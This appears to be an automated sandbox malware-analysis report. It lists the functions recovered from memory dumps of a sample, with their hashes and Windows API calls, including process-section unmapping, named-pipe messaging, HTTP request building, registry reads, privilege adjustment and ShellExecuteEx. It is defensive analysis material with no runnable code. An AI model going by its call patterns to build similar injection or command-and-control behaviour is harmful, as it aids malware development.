  • Instruction ID: 4148eaee69a31b6fb3cd0b83f2f9e5c8e854a768ff6cb781906392e167196464
  • Opcode Fuzzy Hash: C6D0A7B057080ACAC517A130847936FABD5EFC51C1E8D0776F780B106F6B9731EA989E
  • Instruction Fuzzy Hash: 4148eaee69a31b6fb3cd0b83f2f9e5c8e854a768ff6cb781906392e167196464
APIs
  • CreateNamedPipeA.KERNEL32(40000003,00000004,000000FF,00000100,00000100,00000000,001EB0D8,079007F4), ref: 001CBED5
  • CreateThread.KERNEL32(00000000,00000000,001CBB92,00000000,00000000,?), ref: 001CBEEF
  • GetLastError.KERNEL32(?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CBF00
  • CloseHandle.KERNEL32(00000000), ref: 001CBF09
  • GetLastError.KERNEL32(?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CBF11
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CDCA5, Relevance: 4.5, APIs: 3, Instructions: 27 Total matches: 86memorynative
Similarity
  • Total matches: 86
  • API ID: HeapFreeNtUnmapViewOfSectionRtlNtStatusToDosError
  • String ID:
  • API String ID: 3330954857-0
  • Opcode ID: 02a61448e217c9ef6f534c07a9fd427649efd77a8a877fb27eb9f5184da74e11
  • Instruction ID: 0644c66e21c54e57ba80f44bb6735bfe181557861a3a7a617ae7e4636646a487
  • Opcode Fuzzy Hash: 1CC02BB0481582C3B53F0CA2008E126ED45BAD32E0A0E1025E0083404CF5A3C7FCBF49
  • Instruction Fuzzy Hash: 0644c66e21c54e57ba80f44bb6735bfe181557861a3a7a617ae7e4636646a487
APIs
  • NtUnmapViewOfSection.NTDLL(079007F4), ref: 001CDCCE
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 001CDCD5
  • HeapFree.KERNEL32(00000000,00000000,079007F4), ref: 001CDCE4
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CCB46, Relevance: 37.1, APIs: 15, Strings: 6, Instructions: 378 Total matches: 52memorystring
Similarity
  • Total matches: 52
  • API ID: HeapFreeRtlAllocateHeaplstrlen$StrChrmemcpy$lstrcpynmemmove
  • String ID: GET $GET $OPTI$OPTI$POST$PUT
  • API String ID: 2276190360-647159250
  • Opcode ID: 54d3a76867c680fbcbb72380afb113d398c97eb44d4465c367e7f7ee21a8a799
  • Instruction ID: b8b73962650da9c8cbf1578ec52c8a5265e5485c2cc85bc05aa2a259874b6926
  • Opcode Fuzzy Hash: 1F41DB301A4E81C7D933309200B7BFAD045FF93694C8DA356CA0165B6F6F826227BB4E
  • Instruction Fuzzy Hash: b8b73962650da9c8cbf1578ec52c8a5265e5485c2cc85bc05aa2a259874b6926
APIs
  • lstrlen.KERNEL32(001ECCEF,00000000,?,?), ref: 001CCB9E
    • Part of subcall function 001C7E94: memset.NTDLL ref: 001C7ED0
    • Part of subcall function 001C7E94: HeapFree.KERNEL32(00000000,00000000), ref: 001C7EED
    • Part of subcall function 001C7E94: memcpy.NTDLL(?,?,001CC506,?,001CC506,?,?,00000000,?,00000000,001CCA48,?,00000000), ref: 001C7F0E
  • RtlAllocateHeap.NTDLL(00000000,?,?), ref: 001CCC38
  • lstrcpyn.KERNEL32(00000000,?,?), ref: 001CCC4D
    • Part of subcall function 001CB4E6: RtlEnterCriticalSection.NTDLL(001EB248), ref: 001CB4F1
    • Part of subcall function 001CB4E6: Sleep.KERNEL32(0000000A,?,?,001CCC60,00000000), ref: 001CB4FB
    • Part of subcall function 001CB4E6: SetEvent.KERNEL32(?,?,001CCC60), ref: 001CB552
    • Part of subcall function 001CB4E6: RtlLeaveCriticalSection.NTDLL(001EB248), ref: 001CB588
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001CCC69
    • Part of subcall function 001C7D61: RtlAllocateHeap.NTDLL(00000000,?,?), ref: 001C7DC3
    • Part of subcall function 001C7D61: memcpy.NTDLL(00000000,http://,00000007,?,?,?,001CCC81,00000000), ref: 001C7DE9
    • Part of subcall function 001C7D61: memcpy.NTDLL(00000000,?,?,00000000,http://,00000007,?,?,?,001CCC81,00000000), ref: 001C7DF8
    • Part of subcall function 001C7D61: memcpy.NTDLL(?,?,?,00000000,?,?,00000000,http://,00000007,?,?,?,001CCC81,00000000), ref: 001C7E0A
  • HeapFree.KERNEL32(00000000,?), ref: 001CCE32
    • Part of subcall function 001C7CFB: StrChrA.SHLWAPI(00000001,0000000D), ref: 001C7D45
    • Part of subcall function 001CBF21: HeapFree.KERNEL32(00000000,?,?), ref: 001CBFA1
    • Part of subcall function 001CBF21: HeapFree.KERNEL32(00000000,?,?), ref: 001CBFD9
    • Part of subcall function 001CBF21: HeapFree.KERNEL32(00000000,?,?), ref: 001CC048
  • StrChrA.SHLWAPI(?,00000020), ref: 001CCD44
  • StrChrA.SHLWAPI(00000001,00000020), ref: 001CCD55
  • lstrlen.KERNEL32(00000000), ref: 001CCD69
  • memmove.NTDLL(?,?,00000001), ref: 001CCD79
    • Part of subcall function 001CC3FD: HeapFree.KERNEL32(00000000,00000008,00000008), ref: 001CC41E
  • lstrlen.KERNEL32(?,?,00000000,00000000,?,00000000,?,?,?), ref: 001CCD9C
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001CCDC2
  • memcpy.NTDLL(00000000,?,?), ref: 001CCDD6
  • memcpy.NTDLL(?,?,?), ref: 001CCDF6
  • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001CCEF8
    • Part of subcall function 001CAF14: RtlAllocateHeap.NTDLL(00000000,?), ref: 001CAF93
    • Part of subcall function 001CAF14: wsprintfA.USER32 ref: 001CB04B
    • Part of subcall function 001CAF14: memcpy.NTDLL(00000000,?,?), ref: 001CB090
    • Part of subcall function 001CAF14: InterlockedExchange.KERNEL32(001EAFEC,00000000), ref: 001CB0AE
    • Part of subcall function 001CAF14: HeapFree.KERNEL32(00000000,00000000), ref: 001CB0F1
  • HeapFree.KERNEL32(00000000,00000000,?), ref: 001CCF40
    • Part of subcall function 001DAA89: RtlLeaveCriticalSection.NTDLL(?), ref: 001DAB06
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C3684, Relevance: 27.3, APIs: 18, Instructions: 264 Total matches: 106memorystring
Similarity
  • Total matches: 106
  • API ID: HeapFree$RtlAllocateHeap$lstrlenwsprintf
  • String ID:
  • API String ID: 2041449020-0
  • Opcode ID: 540e5d8870bfb511a3d1955c9ad0a08f1ccba355172afbf88c2f817bd2b431a8
  • Instruction ID: bba761aa04d3bbfd698f0c8175b6501ca71d3289cc1fe08320dbb8ae1c2a3fdb
  • Opcode Fuzzy Hash: E33169710A8C82D6C42BA8D284B47BE9144B7C18D9C8D2B37FE583D0AD1F8321C66B92
  • Instruction Fuzzy Hash: bba761aa04d3bbfd698f0c8175b6501ca71d3289cc1fe08320dbb8ae1c2a3fdb
APIs
    • Part of subcall function 001C3C55: RegQueryValueExA.KERNEL32(00000000,001CD4DC,00000000,001CD4DC,00000000,?,00000000,00000000,00000000,00000000,00000001,?,?,?,001C4C86,001EC1F9), ref: 001C3C8D
    • Part of subcall function 001C3C55: RtlAllocateHeap.NTDLL(00000000,?), ref: 001C3CA1
    • Part of subcall function 001C3C55: HeapFree.KERNEL32(00000000,?), ref: 001C3CD7
    • Part of subcall function 001C3C55: RegCloseKey.ADVAPI32(00000000,?,?,?,001C4C86,001EC1F9,001CD4DC,00000000,00000000,00000000,00000001,?,?,?,001CD4DC,00000000), ref: 001C3CE5
  • HeapFree.KERNEL32(00000000,?,001EC206), ref: 001C36C4
  • RtlAllocateHeap.NTDLL(00000000,00010000,001EC206), ref: 001C36E2
  • HeapFree.KERNEL32(00000000,?), ref: 001C3988
    • Part of subcall function 001CBE3C: GetLastError.KERNEL32(000000FF,00000008,?,000000FF,001EB004,?,?,001C3C43,0000012B,001EB004,?,?,?,001C3C71,00000000,00000000), ref: 001CBE7C
    • Part of subcall function 001CBE3C: CloseHandle.KERNEL32(000000FF), ref: 001CBE87
  • HeapFree.KERNEL32(00000000,00000000,0000011A), ref: 001C3713
    • Part of subcall function 001DDB79: RtlAllocateHeap.NTDLL(00000000,00000800,001E53C8), ref: 001DDB9C
    • Part of subcall function 001DDB79: GetTickCount.KERNEL32(?,00000000,00000001,001E53C8,00000002,?,?), ref: 001DDBB2
    • Part of subcall function 001DDB79: QueryPerformanceFrequency.KERNEL32(?), ref: 001DDC07
    • Part of subcall function 001DDB79: QueryPerformanceCounter.KERNEL32(?), ref: 001DDC11
    • Part of subcall function 001DDB79: _aulldiv.NTDLL(?,?,?,?), ref: 001DDC23
    • Part of subcall function 001DDB79: RtlAllocateHeap.NTDLL(00000000,00000800), ref: 001DDCEB
    • Part of subcall function 001DDB79: GetTickCount.KERNEL32 ref: 001DDCFC
    • Part of subcall function 001DDB79: RtlEnterCriticalSection.NTDLL(001EB184), ref: 001DDD10
    • Part of subcall function 001DDB79: RtlLeaveCriticalSection.NTDLL(001EB184), ref: 001DDD2E
    • Part of subcall function 001DDB79: StrTrimA.SHLWAPI(00000000,001E53C8), ref: 001DDD60
    • Part of subcall function 001DDB79: lstrcpy.KERNEL32(?,001ED78A), ref: 001DDD85
    • Part of subcall function 001DDB79: HeapFree.KERNEL32(00000000,?,?), ref: 001DDE1F
    • Part of subcall function 001DDB79: HeapFree.KERNEL32(00000000,00000000,001ED2CA), ref: 001DDE2E
    • Part of subcall function 001DDB79: HeapFree.KERNEL32(00000000,?,00000000), ref: 001DDE3F
    • Part of subcall function 001DDB79: HeapFree.KERNEL32(00000000,001ED78A), ref: 001DDE50
    • Part of subcall function 001DDB79: HeapFree.KERNEL32(00000000,00000000), ref: 001DDE5F
  • HeapFree.KERNEL32(00000000,001E53C8,0000011B), ref: 001C3788
    • Part of subcall function 001DDB3A: memcpy.NTDLL(001CD4DC,001CD4DC,00000000,001CD4DC,001CD4DC,001CD4DC,00000000,?,?,001C4CB1,00000000,00000001,00000000,001EC1F9,001CD4DC,00000000), ref: 001DDB5D
    • Part of subcall function 001D9692: memset.NTDLL ref: 001D96C0
    • Part of subcall function 001D9692: StrTrimA.SHLWAPI(?,001E53C4), ref: 001D9721
    • Part of subcall function 001D9692: StrTrimA.SHLWAPI(00000001,001E53C4), ref: 001D9740
    • Part of subcall function 001D9692: _strupr.NTDLL ref: 001D9747
    • Part of subcall function 001D9692: StrTrimA.SHLWAPI(?,?), ref: 001D9754
    • Part of subcall function 001D9692: memcpy.NTDLL(00000000,00000000,-00000008,-00000020,00000000,-00000020), ref: 001D979C
    • Part of subcall function 001D9692: lstrlen.KERNEL32(?,00000000,?,?,?,00000000,?,00000000,?), ref: 001D97BB
  • RtlAllocateHeap.NTDLL(00000000,00000400,?), ref: 001C3800
  • wsprintfA.USER32 ref: 001C3815
  • lstrlen.KERNEL32(00000000,00000000), ref: 001C3820
  • HeapFree.KERNEL32(00000000,00000000,0000010D), ref: 001C383A
    • Part of subcall function 001C3CF4: RegCloseKey.ADVAPI32(00000057,?,?,001C27E9,001EC202,00000000,00000000,00000000,001EAC78,00000000,00000000,?,?,?,001C4A87,00000000), ref: 001C3D3F
  • RtlAllocateHeap.NTDLL(00000000,00000400,001EC206), ref: 001C38C8
  • wsprintfA.USER32 ref: 001C38DC
  • lstrlen.KERNEL32(00000000,00000000), ref: 001C38E7
  • HeapFree.KERNEL32(00000000,00000000,0000010D), ref: 001C3901
  • HeapFree.KERNEL32(00000000,?,001EC206), ref: 001C3923
  • RtlAllocateHeap.NTDLL(00000000,00000400,?), ref: 001C393E
  • wsprintfA.USER32 ref: 001C394E
  • lstrlen.KERNEL32(00000000,00000000), ref: 001C3959
    • Part of subcall function 001CBD48: lstrlen.KERNEL32(?,00000000,?,?,?,?,?,?,001CD153,00000125,?,00000004,00000000), ref: 001CBD78
    • Part of subcall function 001CBD48: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001CBD8E
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,?,00000000,?,?,?,?,001CD153), ref: 001CBDC4
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,00000000,?), ref: 001CBDDF
    • Part of subcall function 001CBD48: CallNamedPipeA.KERNEL32(00000000,?,?,00000010,00000119,00000001), ref: 001CBDFD
    • Part of subcall function 001CBD48: GetLastError.KERNEL32 ref: 001CBE07
    • Part of subcall function 001CBD48: HeapFree.KERNEL32(00000000,00000000), ref: 001CBE2D
  • HeapFree.KERNEL32(00000000,00000000,0000010D), ref: 001C3973
    • Part of subcall function 001C3ACC: RtlAllocateHeap.NTDLL(00000000,00010000,00000000), ref: 001C3AE8
    • Part of subcall function 001C3ACC: lstrlen.KERNEL32(EMPTY,00000008,001EC4D7,00000000,0000010E,00000000,001C397E,?,?,001C397E), ref: 001C3B26
    • Part of subcall function 001C3ACC: HeapFree.KERNEL32(00000000,00000000,EMPTY), ref: 001C3B3D
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001D9BD6, Relevance: 26.5, APIs: 13, Strings: 2, Instructions: 208 Total matches: 54filememorytime
Similarity
  • Total matches: 54
  • API ID: FindNextFileHeapFree$CloseHandleCompareFileTimeCreateFileGetFileTimeStrChrStrRChrlstrcatmemcpymemset
  • String ID: [FILE]$}nls
  • API String ID: 2232422578-3867520224
  • Opcode ID: d63c3d0b7d30395697a42598c95896d20b1220c6287163fcac3fa7287f978ce5
  • Instruction ID: 72ed0b863297d3488007a14820031ed271860468cbdb941106eaa0929c179687
  • Opcode Fuzzy Hash: C821E123044BD393D22369821181BA65755FB419E3C0C73F3E9BCB538D4F02A6CA6B96
  • Instruction Fuzzy Hash: 72ed0b863297d3488007a14820031ed271860468cbdb941106eaa0929c179687
APIs
  • memset.NTDLL ref: 001D9C3D
  • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 001D9C6F
  • GetFileTime.KERNEL32(00000000,?,00000000,00000000), ref: 001D9C83
  • CloseHandle.KERNEL32(00000094), ref: 001D9C9A
  • StrRChrA.SHLWAPI(00001000,00000000,0000005C), ref: 001D9CA6
  • lstrcat.KERNEL32(00001000,001EDA23), ref: 001D9CE0
  • FindNextFileA.KERNEL32(00000000,?), ref: 001D9D28
  • StrChrA.SHLWAPI(?,0000002E), ref: 001D9D96
  • memcpy.NTDLL(001EB1D4,?,00000000), ref: 001D9DCF
  • FindNextFileA.KERNEL32(00000000,?), ref: 001D9DE4
  • CompareFileTime.KERNEL32(?,?), ref: 001D9E0D
  • HeapFree.KERNEL32(00000000,001EB1D4), ref: 001D9E43
  • HeapFree.KERNEL32(00000000,00001000), ref: 001D9E53
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C178D, Relevance: 18.1, APIs: 12, Instructions: 117 Total matches: 53registrythreadsleep
Similarity
  • Total matches: 53
  • API ID: CloseHandleRegCloseKey$CreateEventDeleteFileGetLastErrorRegOpenKeyResumeThreadSetEventSleepSuspendThread
  • String ID:
  • API String ID: 1489053536-0
  • Opcode ID: a04800037acdc991d0ac410cda6be3e7e30f85b4b2334a738cde70afcf2a0bc8
  • Instruction ID: 36a5ddbc87084e266d50b713a62e435bbad551641728e73816c0b0ac65f44fd9
  • Opcode Fuzzy Hash: BB0104704685824B81277464983A3BADA15FF802D5D4D6366FE68B40895F8333DA3F27
  • Instruction Fuzzy Hash: 36a5ddbc87084e266d50b713a62e435bbad551641728e73816c0b0ac65f44fd9
APIs
  • RegOpenKeyA.ADVAPI32(80000001,001EC2F4,?), ref: 001C17A8
  • CloseHandle.KERNEL32(001EAF58), ref: 001C1809
  • DeleteFileW.KERNEL32(00000000,?,?,?,?,00000000), ref: 001C1816
  • GetLastError.KERNEL32(?,?,?,00000000), ref: 001C1820
  • RegCloseKey.ADVAPI32(?,?,?,?,00000000), ref: 001C187D
  • RegCloseKey.ADVAPI32(?,?,?,00000000), ref: 001C189C
  • SuspendThread.KERNEL32(00000000), ref: 001C18AA
  • CreateEventA.KERNEL32(001EB0D8,00000001,00000000), ref: 001C18BE
  • SetEvent.KERNEL32(00000000), ref: 001C18CB
  • CloseHandle.KERNEL32(00000000), ref: 001C18D2
  • Sleep.KERNEL32(000001F4), ref: 001C18E5
  • ResumeThread.KERNEL32(00000000), ref: 001C1909
    • Part of subcall function 001D9A9C: RegCloseKey.ADVAPI32(?,00000000), ref: 001D9B23
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C1A08, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 122 Total matches: 58memorythreadstring
Similarity
  • Total matches: 58
  • API ID: HeapFree$GetCurrentThreadGetCurrentThreadIdRtlAllocateHeapRtlImageNtHeaderlstrlenwsprintf
  • String ID: W
  • API String ID: 3968678070-655174618
  • Opcode ID: 65c7814ccee3740933dfcccc29e4eab5d936ac043747db4873335771aa46cfd7
  • Instruction ID: 5d65c5167d05eb071b61c740fb2aa7fd16767ced16d889d5a98f858644bbd093
  • Opcode Fuzzy Hash: 8901B138088895A7C06790614063FBFD6017F822D0C4DF712F9693819E2F4372D35B57
  • Instruction Fuzzy Hash: 5d65c5167d05eb071b61c740fb2aa7fd16767ced16d889d5a98f858644bbd093
APIs
  • RtlImageNtHeader.NTDLL ref: 001C1A48
  • GetCurrentThreadId.KERNEL32 ref: 001C1A5E
  • GetCurrentThread.KERNEL32 ref: 001C1A6F
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBE6D
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,00000018,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBEBC
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,001DC9CF,00000800,?,?,00000000), ref: 001DBF2C
    • Part of subcall function 001DBD3F: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 001DBF67
    • Part of subcall function 001DBD3F: RtlNtStatusToDosError.NTDLL(00000000), ref: 001DBF6E
    • Part of subcall function 001DBD3F: CloseHandle.KERNEL32(00000000), ref: 001DBF7D
    • Part of subcall function 001DBD3F: memset.NTDLL ref: 001DBF91
    • Part of subcall function 001D7471: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
    • Part of subcall function 001D7471: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
    • Part of subcall function 001D7471: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
    • Part of subcall function 001D7471: lstrcpy.KERNEL32(00000000), ref: 001D74DE
    • Part of subcall function 001C1966: lstrlen.KERNEL32(?,00000001,?,?,?,00000001,?,?), ref: 001C19D1
    • Part of subcall function 001C1966: HeapFree.KERNEL32(00000000,00000000), ref: 001C19F9
  • HeapFree.KERNEL32(00000000,?,00000000), ref: 001C1AE3
  • HeapFree.KERNEL32(00000000,00000020,00000000), ref: 001C1AF3
  • RtlAllocateHeap.NTDLL(00000000,00000400), ref: 001C1B3F
  • wsprintfA.USER32 ref: 001C1B50
  • lstrlen.KERNEL32(00000000,00000000), ref: 001C1B5B
    • Part of subcall function 001CBD48: lstrlen.KERNEL32(?,00000000,?,?,?,?,?,?,001CD153,00000125,?,00000004,00000000), ref: 001CBD78
    • Part of subcall function 001CBD48: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001CBD8E
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,?,00000000,?,?,?,?,001CD153), ref: 001CBDC4
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,00000000,?), ref: 001CBDDF
    • Part of subcall function 001CBD48: CallNamedPipeA.KERNEL32(00000000,?,?,00000010,00000119,00000001), ref: 001CBDFD
    • Part of subcall function 001CBD48: GetLastError.KERNEL32 ref: 001CBE07
    • Part of subcall function 001CBD48: HeapFree.KERNEL32(00000000,00000000), ref: 001CBE2D
  • HeapFree.KERNEL32(00000000,00000000,0000010D), ref: 001C1B75
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 01B32CD0, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 108 Total matches: 183string
Similarity
  • Total matches: 183
  • API ID: lstrcpy$CoInitializeExCoUninitializePathFindExtensionShellExecuteExlstrlenmemsetwsprintf
  • String ID: <
  • API String ID: 1457465641-4251816714
  • Opcode ID: 36c43c169b7f4adfcc7eed8db55d242cf47c4c2cff2d35238d5400cc3024a577
  • Instruction ID: 3de0f454e75166d7dc89cb568257ea8f04ae800c90f99e8cafab956dcc2645f6
  • Opcode Fuzzy Hash: 93F078708B2E8BC1CD9158C9160535692C06F30E68E9C9B137824F966B6B20312C9F9D
  • Instruction Fuzzy Hash: 3de0f454e75166d7dc89cb568257ea8f04ae800c90f99e8cafab956dcc2645f6
APIs
  • memset.NTDLL ref: 01B32CEE
  • CoInitializeEx.OLE32(00000000,00000002), ref: 01B32CF9
  • PathFindExtensionW.SHLWAPI(00000000), ref: 01B32D14
  • lstrcpyW.KERNEL32(00000000,01B38224), ref: 01B32D29
  • lstrlen.KERNEL32(01B37494,?,?,?,?,?,?,?,?,?,?,01B318D7,?), ref: 01B32D46
  • lstrcpyW.KERNEL32(00000000,01B384B8), ref: 01B32D77
    • Part of subcall function 01B3115C: RtlAllocateHeap.NTDLL(00000000,?,01B33CA0), ref: 01B31168
  • wsprintfW.USER32 ref: 01B32DAE
  • ShellExecuteExW.SHELL32(0000003C), ref: 01B32DE3
  • CoUninitialize.OLE32 ref: 01B32DF7
    • Part of subcall function 01B31171: HeapFree.KERNEL32(00000000,?,01B33D05), ref: 01B3117D
Strings
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Function 001C1586, Relevance: 16.6, APIs: 11, Instructions: 78 Total matches: 43memoryfile
Similarity
  • Total matches: 43
  • API ID: GetLastError$CloseHandleCreateFileGetModuleHandleGetWindowsDirectoryHeapFreeRtlAllocateHeapStrChrWriteFilewsprintf
  • String ID:
  • API String ID: 2627060994-0
  • Opcode ID: db8d6b5184187aba615ed9859a1217546e47d51c2a19850b1dde47917d77b9bd
  • Instruction ID: df8b16018d32c17adcafddecac367e62ad292682b52cd612f4b16c26ee5ce5b9
  • Opcode Fuzzy Hash: 00E05538564C02C3C4279AA888803BEDA41B3801C1E8E0212FA002A5BAAB0323C88F63
  • Instruction Fuzzy Hash: df8b16018d32c17adcafddecac367e62ad292682b52cd612f4b16c26ee5ce5b9
APIs
  • RtlAllocateHeap.NTDLL(00000000,00000104,00000000), ref: 001C159D
  • GetWindowsDirectoryA.KERNEL32(00000000,00000104,?,00000000,?,001C2CDE,00000094,00000000), ref: 001C15AF
  • StrChrA.SHLWAPI(00000000,0000003A), ref: 001C15BC
  • wsprintfA.USER32 ref: 001C15D0
  • CreateFileA.KERNEL32(00000002,C0000000,00000003,00000000,00000003,00000000,00000000), ref: 001C15E6
  • GetModuleHandleA.KERNEL32(00000000,00010000,?,00000000), ref: 001C15FF
  • WriteFile.KERNEL32(00000000,00000000), ref: 001C1607
  • GetLastError.KERNEL32 ref: 001C1615
  • CloseHandle.KERNEL32(00000000), ref: 001C161E
    • Part of subcall function 001C154D: RtlAdjustPrivilege.NTDLL(00000013,00000001,00000000,?), ref: 001C155B
    • Part of subcall function 001C154D: GetLastError.KERNEL32(?,001C2CD4), ref: 001C1572
  • GetLastError.KERNEL32(?,00000000,?,001C2CDE,00000094,00000000), ref: 001C162F
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C163F
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C20A7, Relevance: 15.2, APIs: 10, Instructions: 171 Total matches: 60memorystringthread
Similarity
  • Total matches: 60
  • API ID: HeapFree$lstrlenmemcpy$RtlAllocateHeapSwitchToThreadlstrcpy
  • String ID:
  • API String ID: 732536130-0
  • Opcode ID: a427ae31280889244c8d76e620d9b5f9788be67866348582a82e8a58517c2dc5
  • Instruction ID: a2cec6491fe12f34e3abab1a275dd9d209e051195fd81796f6ed6d95fe43367f
  • Opcode Fuzzy Hash: 90116D11582D32C3D113B46AC1E8B7EFA45FF961D6C1F3001E9127510E4A935EF6AB6E
  • Instruction Fuzzy Hash: a2cec6491fe12f34e3abab1a275dd9d209e051195fd81796f6ed6d95fe43367f
APIs
    • Part of subcall function 001C3B4A: HeapFree.KERNEL32(00000000,?,?), ref: 001C3BCD
  • lstrlen.KERNEL32(?,?,?,00000001), ref: 001C216D
  • RtlAllocateHeap.NTDLL(00000000,?,?), ref: 001C218F
  • lstrcpy.KERNEL32(00000020,?), ref: 001C21AE
  • lstrlen.KERNEL32(?), ref: 001C21B8
  • memcpy.NTDLL(?,?,?), ref: 001C21F9
  • memcpy.NTDLL(?,?,?), ref: 001C220C
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C224F
    • Part of subcall function 001CBD48: lstrlen.KERNEL32(?,00000000,?,?,?,?,?,?,001CD153,00000125,?,00000004,00000000), ref: 001CBD78
    • Part of subcall function 001CBD48: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001CBD8E
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,?,00000000,?,?,?,?,001CD153), ref: 001CBDC4
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,00000000,?), ref: 001CBDDF
    • Part of subcall function 001CBD48: CallNamedPipeA.KERNEL32(00000000,?,?,00000010,00000119,00000001), ref: 001CBDFD
    • Part of subcall function 001CBD48: GetLastError.KERNEL32 ref: 001CBE07
    • Part of subcall function 001CBD48: HeapFree.KERNEL32(00000000,00000000), ref: 001CBE2D
  • SwitchToThread.KERNEL32(?,00000000,?,?), ref: 001C2230
    • Part of subcall function 001C2B66: memset.NTDLL ref: 001C2BCA
    • Part of subcall function 001C2B66: CloseHandle.KERNEL32(?), ref: 001C2C13
    • Part of subcall function 001C2B66: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C2DC7
    • Part of subcall function 001C2B66: GetLastError.KERNEL32(?,00000000,?), ref: 001C3013
  • HeapFree.KERNEL32(00000000,?,?), ref: 001C2275
  • HeapFree.KERNEL32(00000000,?,?), ref: 001C2291
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001DB838, Relevance: 15.1, APIs: 10, Instructions: 64 Total matches: 62sleepsynchronization
Similarity
  • Total matches: 62
  • API ID: CloseHandle$LocalFreeRtlDeleteCriticalSectionRtlEnterCriticalSectionRtlLeaveCriticalSectionSetEventSleepWaitForSingleObject
  • String ID:
  • API String ID: 1546928802-0
  • Opcode ID: 44cbb82d1bc8bc2d29e416fe044868003d437d2d6ba21b65bae40637e45a7bca
  • Instruction ID: 191c3ac2f4053567846d1cc33e924360c7a86817a4ea2a5247009256dd1e7f80
  • Opcode Fuzzy Hash: 18E02BA421196647D99708B00461B1FAE82BBE23E484C3303F552A25C2BB0712C4DF2A
  • Instruction Fuzzy Hash: 191c3ac2f4053567846d1cc33e924360c7a86817a4ea2a5247009256dd1e7f80
APIs
  • SetEvent.KERNEL32(?,001C1F1A,?,001EB068,?,00000000,001C13EB), ref: 001DB84C
    • Part of subcall function 001DAF5A: InterlockedExchange.KERNEL32(001C13EB,000000FF), ref: 001DAF61
  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 001DB866
  • CloseHandle.KERNEL32(?), ref: 001DB86F
  • CloseHandle.KERNEL32(?), ref: 001DB87D
  • RtlEnterCriticalSection.NTDLL(00000008), ref: 001DB889
  • RtlLeaveCriticalSection.NTDLL(00000008), ref: 001DB8B2
  • Sleep.KERNEL32(000001F4), ref: 001DB8C1
  • CloseHandle.KERNEL32(?), ref: 001DB8CE
  • LocalFree.KERNEL32(?), ref: 001DB8DC
  • RtlDeleteCriticalSection.NTDLL(00000008), ref: 001DB8E6
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001DAFC4, Relevance: 13.8, APIs: 9, Instructions: 278 Total matches: 59memorythread
Similarity
  • Total matches: 59
  • API ID: GetLastError$VirtualAlloc$RtlEnterCriticalSectionRtlLeaveCriticalSectionSwitchToThread
  • String ID:
  • API String ID: 2452875170-0
  • Opcode ID: f7250d7c747c6724e85bc87f4a1d164c9bcb3d791413c0bfd27e5859a3665385
  • Instruction ID: e9cda0ef1bba535e69377ecfbf93933b7da227d9232d932a7ffe86fd6aa33c96
  • Opcode Fuzzy Hash: F931CCA2419FC2A7D5936A400890BBAC5C3FB12FF6D6CA732B674A02C81FC5274D2F54
  • Instruction Fuzzy Hash: e9cda0ef1bba535e69377ecfbf93933b7da227d9232d932a7ffe86fd6aa33c96
APIs
  • VirtualAlloc.KERNEL32(00000000,00008000,00003000,00000004), ref: 001DB03B
  • VirtualAlloc.KERNEL32(00000000,00008000,00003000,00000004), ref: 001DB05A
  • GetLastError.KERNEL32 ref: 001DB20B
  • GetLastError.KERNEL32 ref: 001DB28D
  • SwitchToThread.KERNEL32(?,?,?,?), ref: 001DB2D2
    • Part of subcall function 001DAF5A: InterlockedExchange.KERNEL32(001C13EB,000000FF), ref: 001DAF61
  • GetLastError.KERNEL32 ref: 001DB308
